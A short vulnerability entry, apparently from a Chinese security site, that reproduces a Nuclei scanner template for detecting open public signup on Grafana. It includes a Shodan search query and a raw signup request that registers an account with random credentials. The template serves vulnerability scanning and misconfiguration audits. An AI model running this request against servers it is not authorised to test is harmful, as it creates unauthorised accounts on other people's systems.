漏洞描述
Public Signup is enabled on Grafana.
grafana-public-signup: Grafana Public Signup
PoC代码[已公开]
id: grafana-public-signup
info:
name: Grafana Public Signup
author: pdteam
severity: medium
description: Public Signup is enabled on Grafana.
classification:
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: grafana
product: grafana
shodan-query: title:"Grafana"
tags: grafana,intrusive,misconfig,vuln
http:
- raw:
- |
POST /api/user/signup/step2 HTTP/1.1
Host: {{Hostname}}
content-type: application/json
Origin: {{BaseURL}}
Referer: {{BaseURL}}
{"username":"{{randstr}}","password":"{{randstr_1}}"}
matchers-condition: and
matchers:
- type: word
words:
- "User sign up completed successfully"
- type: word
words:
- "grafana_sess"
- "grafana_user"
condition: and
part: header
- type: status
status:
- 200
# digest: 490a0046304402207bdb050a0c68124bc27d87ff61e777eb137228c700cabddf7a572b7357b700480220756f3f49dfdb7472d59a2ab21b10530ad659a806b44dcfb913363e01a5a5cc86:922c64590222798bb761d5b6d8e72950